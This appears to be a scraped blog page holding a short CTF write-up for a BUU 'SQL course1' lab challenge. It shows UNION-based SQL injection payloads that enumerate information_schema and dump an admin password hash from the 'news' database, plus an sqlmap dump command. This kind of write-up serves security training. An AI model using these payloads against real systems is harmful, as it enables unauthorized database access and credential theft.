当前位置:网站首页>[writeup]buu SQL course1[entry level]
[writeup]buu SQL course1[entry level]
2022-06-12 14:45:00 【_ Xiao SA】
Observation website , Seems to have found the injection point
http://70e2a79f-6017-4286-b07f-1729220b2c7d.node4.buuoj.cn:81/#/content/-1 union select 1,2
/-1 union select 1,(
select group_concat(schema_name) from information_schema.schemata
)
Get the database
ctftraining
Get table name
-1 union select 1,(
select group_concat(table_name) from information_schema.tables where table_schema="ctftraining"
)
FLAG_TABLE
Get column name
-1 union select 1,(
select group_concat(column_name) from information_schema.columns where table_schema="ctftraining" and table_name='FLAG_TABLE'
)
FLAG_COLUMN
When getting data, it is found that the data is empty , We can only find another way
See if you can log in
news Found under the database of admin Password :67fef29ef7beb75f567587f135fa26a0
get flag
payload:
-1 union select 1,(
select group_concat(password) from news.admin
)
Use sqlmap
burp The injection point can be found directly in the 
python sqlmap -u url -D ”news” --dump-a
边栏推荐
- Mysql之索引和视图
- 阿里建议所有 POJO 类属性使用包装类,但这些坑你有注意到吗?
- Crawler problem set (I) record
- 亿纬锂能拟募资90亿:刘金成骆锦红夫妇合计认购60亿 布局光谷
- Interview (XI) futu written test questions
- Two months' experience in C language
- 【Calendar】1. For globalization 2 But only date can be formatted by SDF 3 Month to -1 4 Week from Sunday is the first day
- Energy chain smart electronics landed on NASDAQ: Bain is the shareholder to become the first share of charging services in China
- Autofac初学(1)
- Machine learning learning notes
猜你喜欢
New technology: efficient self-monitoring visual pre training, local occlusion no longer need to worry!
野指针理解
【LDA】EM变分推理 粗略版笔记【待完善
Jetpack架构组件学习(3)——Activity Results API使用
Autofac初学(1)
Recursive summary of learning function
Installation and use of mat
Easygui query the company name in the document
QT to realize the simple use of SQLite database
NetCore结合CAP事件总线实现分布式事务——入门(1)
随机推荐
JUnit test suite method sorting (method 2 is not easy to use)
Word insert picture blocked by text
C secret arts script Chapter 5 (structure) (Section 2)
函数递归示例
[Writeup]BUU SQL COURSE1[入门级]
Module VIII
Location (I) error: command erred out with exit status
Serialization and deserialization mechanism in terms of games
NetCore结合CAP事件总线实现分布式事务——入门(1)
你敢信?开发一个管理系统我只用了两天
三维重建系统 | L3增量运动恢复结构(增量SFM)
Yiwei lithium energy plans to raise 9billion yuan: liujincheng and luojinhong jointly subscribe for 6billion yuan of layout Optical Valley
Junit测试中常用的断言
【LocalDate LocalTime LocalDateTime】1. Using immutability to achieve thread safety 2 Current date, current time, current date time 3 Since the time zone is not considered, you need to add 8 hours to th
Ali suggests that all POJO attributes use wrapper classes, but have you noticed these pits?
Configuring OSPF pseudo connection for Huawei devices
JMeter (V) pressure test of Excel file upload interface
Module yaml error: Unexpected key in data: static_context [line 9 col 3]
Detailed explanation of factory pattern (simple factory pattern, factory method pattern, abstract factory pattern) Scala code demonstration
Interview (XI) futu written test questions